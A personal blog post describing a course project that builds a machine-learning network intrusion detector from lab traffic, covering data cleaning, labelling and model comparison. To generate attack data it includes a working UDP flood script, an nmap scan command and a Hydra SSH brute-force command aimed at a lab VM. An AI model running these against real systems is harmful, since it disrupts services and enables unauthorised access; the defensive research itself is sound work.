Basic Machine Learning : Network Anomaly Detection

Disclaimer: This note was written by me (Mayank Nauni) in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the views of my employer or any preference of mine towards any of the OEMs.

Special Thanks to Kenny Ong, my friend & course-mate at Singapore University of Technology and Design for collaborating with me on this mini-project and Tao Liu for his excellent blog on the same subject https://www.linkedin.com/pulse/build-machine-learning-model-network-flow-tao-liu/

Introduction

Network attacks have grown in number alongside the advances in Internet technology that continue to improve our lives, and in recent years network intrusion detection has become a significant research topic in the industry.

The term network anomaly detection refers to identifying rare and unexpected bursts of activity within a computer network. A network anomaly, in this context, is a deliberate intrusion attempt aimed at (i) accessing information, (ii) manipulating information, or (iii) rendering a computer system or network unreliable or unusable.

In this project, setting up anomaly detection properly first requires grasping the concept of normality: the captured traffic has to be defined as either normal or anomalous. Using tools to create our own datasets helps us learn more about network intrusion detection methods and systems (NIDS).

 

Lab Setup and Topology

The network topology is set up in the GNS3 emulator to simulate the network anomaly detection system. The devices and virtual machines (VMs) are as follows:

  • Switch (Gateway) Based on Cisco IOS image (12.4) – 10.0.2.1
  • Kali Attacker VM – 2021.2 release – 10.0.2.15
  • Metasploitable-2 VM – 10.0.2.2
  • SIEM VM – 10.0.2.30

GitHub Repo: https://github.com/mayanknauni/ML_Cybersecurity

Topology Brief:

The topology was created in the GNS3 network emulator, which uses a real IOS image (version 12.4) for the Cisco switch. The Kali VM (2021.2 release) and the Metasploitable VM were created in VirtualBox, which is integrated with GNS3; the VMs are connected to the switch using a generic driver (UDP tunnel).

On the switch, we created a SPAN session that captures all traffic on the port connected to the Metasploitable VM and redirects it to the SIEM VM. We use “tshark” on the SIEM VM to convert the captured “.pcap” files to “.csv” files.

Below is the GNS3 topology that we created and used for this project. The SIEM was an additional VM used to sniff the traffic during the attacks and see how SIEM software perceives them.

[Figure: GNS3 lab topology]

Strategy

We set out to build a machine learning model for classifying Wireshark packet flows. The model is prepared according to the strategy below:

Our strategy is to execute four attacks, elaborated in the Methods section, and manually capture the packets for each on the Metasploitable server end. Each capture is labelled accordingly, and all four attack captures are then aggregated with the benign network capture to form a dataset.

The dataset is then sanitized with a Python script, which checks the dataset for NaN values and replaces empty cells with 0.

We also replaced the IP addresses and TCP flag values with integers so that our algorithms could process them.
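As a small worked example of those two conversions, the sketch below turns a dotted-quad address and a hex flags string into integers. The helper names ip_to_int and flags_to_int are illustrative only and are not part of the project scripts; the conversions themselves mirror what the clean-up script later in this post does.

```python
import ipaddress


def ip_to_int(address):
    """Convert a dotted-quad IPv4 string to its 32-bit integer value."""
    return int(ipaddress.IPv4Address(address))


def flags_to_int(hex_flags):
    """Convert a hex flags string such as '0x0012' to an integer."""
    return int(str(hex_flags), 16)


# The Kali attacker address from the lab topology.
print(ip_to_int("10.0.2.15"))
# 0x0012 has the SYN (0x02) and ACK (0x10) bits set.
print(flags_to_int("0x0012"))
```

Mapping addresses to integers keeps every column numeric, although the resulting values carry no meaningful ordering for the classifier.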

Methods

Creating the datasets involves capturing the normal, benign communication between the clients and servers, driven through scripts, with all traffic collected using Wireshark as the packet capture tool.

The 4 kinds of attacks implemented and run from the malicious clients are as follows:

  • DDoS
  • Brute force
  • Probe
  • SQL

The benign and malicious traffic from these captures is merged and labelled for classification and further analysis in Weka.

Attack Details

The attacks were carried out at the times below:

Start Time | End Time | Exploit | Remark
8:05 pm | 8:15 pm | Benign | Normal web access simulated with watch at a 5-second interval: watch -n 5 "curl http://10.0.2.2"
8:16 pm | 8:20 pm | DDoS | ddos.py
9:00 pm | 9:06 pm | Probe | nmap
9:15 pm | 9:20 pm | Brute force | Hydra
9:30 pm | 9:37 pm | SQL | Metasploitable

Benign Flow Capture

We simulated normal web access by running curl under watch at a 5-second interval and captured the packets:

Command: watch -n 5 "curl http://10.0.2.2"

DDoS Attack and packet capture

We used the Python 2 code below to simulate a DDoS attack on Metasploitable2:

# Python 2 script; run with python2
import sys
import os
import time
import socket
import random
# Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP socket
bytes = random._urandom(1490)  # random 1490-byte payload
#############

os.system("clear")
os.system("figlet DDos Attack")
print
print
ip = raw_input("IP Target : ")
port = input("Port : ")

os.system("clear")
os.system("figlet Attack Starting")
time.sleep(3)
sent = 0
while True:
    # Send one payload, then move on to the next port
    sock.sendto(bytes, (ip, port))
    sent = sent + 1
    port = port + 1
    print "Sent %s packet to %s through port:%s" % (sent, ip, port)
    if port == 65534:
        port = 1

Command: python2 ddos.py

The attack runs endlessly until we interrupt the script.

Nmap Probe and Packet Capture

We used the nmap command below to initiate a probe on Metasploitable2:

Command: nmap -sC -sV -oA project 10.0.2.2

Packets were captured from the time the scan started until it completed successfully.

Bruteforce and Packet Capture

We used Hydra to launch a brute-force attack against SSH (port 22) through repeated login attempts:

Command: sudo hydra -V -f -t 4 -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.2

Feature Extraction (using T-Shark)

Command:

tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f \
  -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf \
  -e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto \
  -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer \
  -e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length \
  -e http.request -e udp.port -e frame.time_relative -e frame.time_delta \
  -e tcp.time_relative -e tcp.time_delta > benign.csv

We select the following 26 features from the Wireshark capture:

Feature | Description | Type
ip.src | Source Address | IPv4 address
ip.dst | Destination Address | IPv4 address
ip.len | Total Length | Unsigned integer, 2 bytes
ip.flags.df | Don’t fragment | Boolean
ip.flags.mf | More fragments | Boolean
ip.fragment | IPv4 Fragment | Frame number
ip.fragment.count | Fragment count | Unsigned integer, 4 bytes
ip.fragments | IPv4 Fragments | Sequence of bytes
ip.ttl | Time to Live | Unsigned integer, 1 byte
ip.proto | Protocol | Unsigned integer, 1 byte
tcp.window_size | Calculated window size | Unsigned integer, 4 bytes
tcp.ack | Acknowledgment Number | Unsigned integer, 4 bytes
tcp.seq | Sequence Number | Unsigned integer, 4 bytes
tcp.len | TCP Segment Len | Unsigned integer, 4 bytes
tcp.stream | Stream index | Unsigned integer, 4 bytes
tcp.urgent_pointer | Urgent Pointer | Unsigned integer, 2 bytes
tcp.flags | Flags | Unsigned integer, 2 bytes
tcp.analysis.ack_rtt | The RTT to ACK the segment was | Time offset
tcp.segments | Reassembled TCP Segments | Label
tcp.reassembled.length | Reassembled TCP length | Unsigned integer, 4 bytes
http.request | Request | Boolean
udp.port | Source or Destination Port | Unsigned integer, 2 bytes
frame.time_relative | Time since reference or first frame | Time offset
frame.time_delta | Time delta from previous captured frame | Time offset
tcp.time_relative | Time since first frame in this TCP stream | Time offset
tcp.time_delta | Time since previous frame in this TCP stream | Time offset
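Since the same extraction has to be repeated for every capture, the tshark call can be assembled from the feature list rather than typed out each time. The sketch below is one possible way to do that; the names FIELDS, build_tshark_args and extract_features are hypothetical and not part of the project repository, and only tshark options already shown in the command above are used.

```python
import subprocess

# The 26 field names from the feature table above.
FIELDS = (
    "ip.src", "ip.dst", "ip.len", "ip.flags.df", "ip.flags.mf",
    "ip.fragment", "ip.fragment.count", "ip.fragments", "ip.ttl", "ip.proto",
    "tcp.window_size", "tcp.ack", "tcp.seq", "tcp.len", "tcp.stream",
    "tcp.urgent_pointer", "tcp.flags", "tcp.analysis.ack_rtt", "tcp.segments",
    "tcp.reassembled.length", "http.request", "udp.port",
    "frame.time_relative", "frame.time_delta",
    "tcp.time_relative", "tcp.time_delta",
)


def build_tshark_args(pcap_path, fields=FIELDS):
    """Return the tshark argument list that exports the given fields as CSV."""
    args = ["tshark", "-r", pcap_path, "-T", "fields",
            "-E", "header=y", "-E", "separator=,",
            "-E", "quote=d", "-E", "occurrence=f"]
    for field in fields:
        args += ["-e", field]
    return args


def extract_features(pcap_path, csv_path):
    """Run tshark on one capture and write its output to csv_path."""
    with open(csv_path, "w") as out:
        subprocess.run(build_tshark_args(pcap_path), stdout=out, check=True)
```

Calling extract_features("http.pcap", "benign.csv") would then be equivalent to the command above, assuming tshark is installed and on the PATH.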

Data Clean-up

Command: python3 step1_cleanup.py benign.csv

The script below cleans up the supplied CSV file, benign.csv in this case: all null values are filled with 0, and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.

#!/usr/bin/env python3

import ipaddress
import sys

import pandas as pd

filename = sys.argv[1]
data = pd.read_csv(filename)

# Step 1: replace all null values with 0
update_file = data.fillna(0)

# Step 2: convert tcp.flags (hex string) and ip.dst / ip.src (dotted quad) to integers
update_file['tcp.flags'] = update_file['tcp.flags'].apply(lambda x: int(str(x), 16))
update_file['ip.dst'] = update_file['ip.dst'].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file['ip.src'] = update_file['ip.src'].apply(lambda x: int(ipaddress.IPv4Address(x)))

# Step 3: write the cleaned data to updated_<filename>
update_file.to_csv('updated_' + filename, index=False)

The command above generates a new file with the cleaned-up data, named “updated_benign.csv”.

Data Labelling

We use another Python script to add a column named “label” to the file “updated_benign.csv”, passing the label value on the command line:

Command: python2 step2_labelling.py benign updated_benign.csv

import csv
import sys

label = sys.argv[1]
file_name = sys.argv[2]

# Read every row, adding the 'label' header and the label value to each record
with open(file_name) as source:
    content = csv.reader(source)
    header = next(content)
    header.append('label')
    rows = [header]
    for item in content:
        item.append(label)
        rows.append(item)

# Write the labelled rows to <label>_<file_name>
with open(label + '_' + file_name, 'w') as new_file:
    writer = csv.writer(new_file, lineterminator='\n')
    writer.writerows(rows)

It creates a new file named benign_updated_benign.csv, where the leading “benign” is the label we passed to the Python script.

This step is repeated for all four attacks, so that together with the benign capture five labelled CSV files are obtained:

  • benign_update_benign.csv
  • bruteforce_update_bruteforce.csv
  • ddos_update_ddos.csv
  • probe_update_nmap.csv
  • sqlattack_update_sqlattack.csv

We aggregate the five files above into a common dataset called “master_dataset.csv”, which we then analyze in Weka.
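The post does not show how the aggregation was done, so the following is only a minimal sketch of one way to do it with pandas, assuming every labelled file shares the same header. The function name build_master_dataset is hypothetical.

```python
import pandas as pd


def build_master_dataset(labelled_csv_paths, output_path="master_dataset.csv"):
    """Concatenate labelled capture files into one dataset and save it."""
    frames = [pd.read_csv(path) for path in labelled_csv_paths]

    # All files come from the same tshark command, so their columns should match.
    expected = list(frames[0].columns)
    for path, frame in zip(labelled_csv_paths, frames):
        if list(frame.columns) != expected:
            raise ValueError("Unexpected columns in " + path)

    master = pd.concat(frames, ignore_index=True)
    master.to_csv(output_path, index=False)
    return master
```

It would be called with the list of the five labelled file names, and the column check guards against merging a file that was extracted with a different field list.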

Analysis on Weka

We opened “master_dataset.csv” in Weka for analysis; a glimpse of the label attribute is below:

[Figure: label attribute of master_dataset.csv as shown in Weka]

Feature Evaluation

We ran ReliefFAttributeEval, which yielded the results below:

[Figure: ReliefFAttributeEval output in Weka]

The top 15 attributes out of 26 are ranked below:

Rank Attributes
1 tcp.stream
2 ip.flags.df
3 tcp.flags
4 ip.proto
5 tcp.window_size
6 frame.time_relative
7 ip.len
8 ip.flags.mf
9 udp.port
10 ip.fragment.count
11 tcp.len
12 tcp.analysis.ack_rtt
13 ip.dst
14 ip.fragment
15 tcp.ack

Running Different ML Models

J48

Correctly Classified Instances 16204 98.4088 %

Incorrectly Classified Instances 262 1.5912 %

J48 Decision Tree View

[Figure: J48 decision tree]

MLP

Correctly Classified Instances 16148 98.0687 %

Incorrectly Classified Instances 318 1.9313 %

SMO

Correctly Classified Instances 15815 96.0464 %

Incorrectly Classified Instances 651 3.9536 %

Naïve Bayes

Correctly Classified Instances 15216 92.4086 %

Incorrectly Classified Instances 1250 7.5914 %

Summary of Weka Models

Based on the outputs above, the J48 decision tree model gave us the best accuracy, so we proceeded to build a detection tool around it.

Model Accuracy
J48 98.41%
MLP 98.07%
SMO 96.05%
Naïve Bayes 92.41%
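The percentages in the table follow directly from the instance counts Weka reported for each model. As a quick check, the snippet below recomputes them from the correctly and incorrectly classified counts quoted above; the variable and function names are illustrative.

```python
# (correctly classified, incorrectly classified) instances per model, from the Weka output
results = {
    "J48": (16204, 262),
    "MLP": (16148, 318),
    "SMO": (15815, 651),
    "Naive Bayes": (15216, 1250),
}


def accuracy_percent(correct, incorrect):
    """Accuracy as a percentage of all classified instances."""
    return 100.0 * correct / (correct + incorrect)


for name, (correct, incorrect) in results.items():
    total = correct + incorrect
    print(f"{name}: {accuracy_percent(correct, incorrect):.2f}% of {total} instances")
```

Every model was evaluated on the same 16,466 instances, so the accuracies are directly comparable.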

Building Offline Detection Tool

We used the following environment to build our offline detection tool:

  • Python: 3.8.5 (default, Jan 27 2021, 15:41:15) [GCC 9.3.0]
  • scipy: 1.6.0
  • numpy: 1.19.5
  • matplotlib: 3.4.3
  • pandas: 1.3.1
  • sklearn: 0.24.2

We split our data into three datasets: one for training, another for validation, and the last one for testing. The program runs against the default dataset “master_dataset.csv”.

We compared the accuracy of the following models:

  • ‘LR’ : Logistic Regression
  • ‘LDA’: Linear Discriminant Analysis
  • ‘KNN’: KNeighbors Classifier
  • ‘CART’: Decision Tree Classifier

Command: python3 step3_train.py

[Figure: output of step3_train.py comparing model accuracy]

We use CART, a decision tree classifier, which is a white-box type of ML algorithm. The time complexity of a decision tree is a function of the number of records and the number of attributes in the data. Decision trees can handle high-dimensional data with good accuracy.

As seen in the output above, CART had the highest accuracy in the first comparison, 98.21%, which is very close to the 98.41% we observed with J48 in Weka.

The accuracy on the final testing dataset was 98.31%.
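The comparison described above can be sketched roughly as follows. This is not the contents of step3_train.py: it uses synthetic five-class data from make_classification in place of master_dataset.csv, and it assumes a 20% hold-out test set with 10-fold cross-validation on the remainder for training and validation. The split sizes, fold count and random seeds are all assumptions.

```python
from sklearn.datasets import make_classification
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import StratifiedKFold, cross_val_score, train_test_split
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier

# Synthetic five-class data standing in for master_dataset.csv (assumption).
X, y = make_classification(n_samples=600, n_features=10, n_informative=6,
                           n_classes=5, n_clusters_per_class=1, random_state=1)

# Hold out 20% for final testing; the rest is used for training and validation.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, stratify=y, random_state=1)

models = {
    "LR": LogisticRegression(max_iter=1000),
    "LDA": LinearDiscriminantAnalysis(),
    "KNN": KNeighborsClassifier(),
    "CART": DecisionTreeClassifier(random_state=1),
}

# 10-fold cross-validation: each fold serves once as the validation set.
folds = StratifiedKFold(n_splits=10, shuffle=True, random_state=1)
cv_scores = {}
for name, model in models.items():
    scores = cross_val_score(model, X_train, y_train, cv=folds, scoring="accuracy")
    cv_scores[name] = scores.mean()
    print(f"{name}: {scores.mean():.4f} ({scores.std():.4f})")

# Fit the decision tree on the full training portion and score the held-out test set.
cart = models["CART"].fit(X_train, y_train)
test_accuracy = cart.score(X_test, y_test)
print(f"CART test accuracy: {test_accuracy:.4f}")
```

The scores printed for the synthetic data say nothing about the real dataset; the point is only the shape of the workflow, with cross-validated comparison first and a single final check on data the model has not seen.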

We saved our model using the joblib library as “finalized_DT_model.sav”.

Executing the model on a new dataset
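Saving and reloading a model with joblib looks roughly like the sketch below. The tiny two-feature training set is made up for illustration, and the file is written to a temporary directory rather than the project folder; only the file name is taken from the post.

```python
import os
import tempfile

import joblib
from sklearn.tree import DecisionTreeClassifier

# Toy training data (illustrative only): the first feature decides the label.
X_train = [[0, 0], [0, 1], [1, 0], [1, 1]]
y_train = ["benign", "benign", "probe", "probe"]
model = DecisionTreeClassifier(random_state=1).fit(X_train, y_train)

# Persist the fitted model, then load it back as a separate object.
model_path = os.path.join(tempfile.mkdtemp(), "finalized_DT_model.sav")
joblib.dump(model, model_path)
restored = joblib.load(model_path)

# The restored model predicts without any retraining.
predictions = restored.predict([[1, 0], [0, 1]])
print(list(predictions))
```

A model saved this way should be loaded with the same scikit-learn version that produced it, since the file format is not guaranteed to be compatible across versions.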

We initiated a fresh probe, captured the traffic, converted it to CSV, labelled it “unknown”, and appended it to master_dataset.csv. We then ran the same model again and checked the confusion matrix. As seen below, the confusion matrix places all of the new probe records in the fourth column, which is the probe class itself.

[Figure: confusion matrix for the dataset with the new probe capture]

We also ran the amended master_dataset.csv through the Weka J48 model to confirm our results. As expected, it gave similar results in the confusion matrix, which confirms that the prediction works as expected.
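To show how such a matrix is read, here is a small sketch with made-up predictions; the counts are illustrative and are not the project's results. It assumes the class names follow the labelled file names plus the extra “unknown” label, in alphabetical order, which puts probe in the fourth column.

```python
from sklearn.metrics import confusion_matrix

# Class order (assumed): rows are true labels, columns are predicted labels.
labels = ["benign", "bruteforce", "ddos", "probe", "sqlattack", "unknown"]

# Made-up example: four records labelled "unknown" that the model predicts as probe.
y_true = ["unknown"] * 4 + ["benign"] * 2 + ["probe"]
y_pred = ["probe"] * 4 + ["benign"] * 2 + ["probe"]

matrix = confusion_matrix(y_true, y_pred, labels=labels)
print(matrix)

# Row "unknown", column "probe": how many unknown records were classified as probe.
unknown_as_probe = matrix[labels.index("unknown")][labels.index("probe")]
print(unknown_as_probe)
```

Because the model was never trained on an “unknown” class, it can only assign those records to one of the known classes, so a full “unknown” row landing in the probe column is what a correct detection looks like here.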

Results

We successfully produced a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with those produced by Weka, which indicates that the tool we created and the model we deployed produce valid results.

Discussion

We first tried “CICFlowMeter” for feature extraction. It took us days just to get it running, as most of its dependencies are very old, and even then it gave erroneous output for the same data across multiple iterations. For example, for a flow of 2,200 packets it produced output for only 101 packets, which made us switch to tshark instead.

We tried different ways of attacking the Metasploitable VM, but given the limited resources of our laptop the VMs crashed frequently, so we had to select attack methods that were not resource-intensive.

We concluded that our model’s very high accuracy of 98.4% is partly a result of the small dataset we used, which introduces some bias. For a production environment with more infrastructure resources available, we would run the captures for days.

We have provided the files below as part of the submission.

Serial | File | Remark
1 | step1_cleanup.py | For CSV cleanup: python3 step1_cleanup.py filename.csv
2 | step2_labelling.py | For labelling the CSV: python2 step2_labelling.py benign updated_benign.csv
3 | step3_train.py | For training and prediction (refers to static file master_dataset.csv): python3 step3_train.py
4 | master_dataset.csv | Consolidated dataset
5 | Folder: Wireshark Captures | Raw attack Wireshark captures
6 | Folder: Labelled Data | Individual attack CSV files
7 | finalized_DT_model.sav | Saved ML model
8 | ddos.py | For DDoS simulation: python2 ddos.py

References

https://machinelearningknowledge.ai/decision-tree-classifier-in-python-sklearn-with-example/

https://stackabuse.com/decision-trees-in-python-with-scikit-learn/

https://github.com/Ha3MrX/DDos-Attack

https://github.com/bibs2091/Anomaly-detection-system

https://github.com/cstub/ml-ids

https://github.com/Kihy/pcap_data/blob/master/normal_flow.csv

https://github.com/abhishekpatel-lpu/CICIDS-2017-intrution-detection

https://www.youtube.com/watch?v=OmM30Nl4pqk

https://thecleverprogrammer.com/2020/08/12/network-security-with-machine-learning/

https://machinelearningmastery.com/machine-learning-in-python-step-by-step/

https://stackoverflow.com/questions/62695117/convert-an-ip-address-into-a-string-python

https://stackoverflow.com/questions/5619685/conversion-from-ip-string-to-integer-and-backward-in-python

 
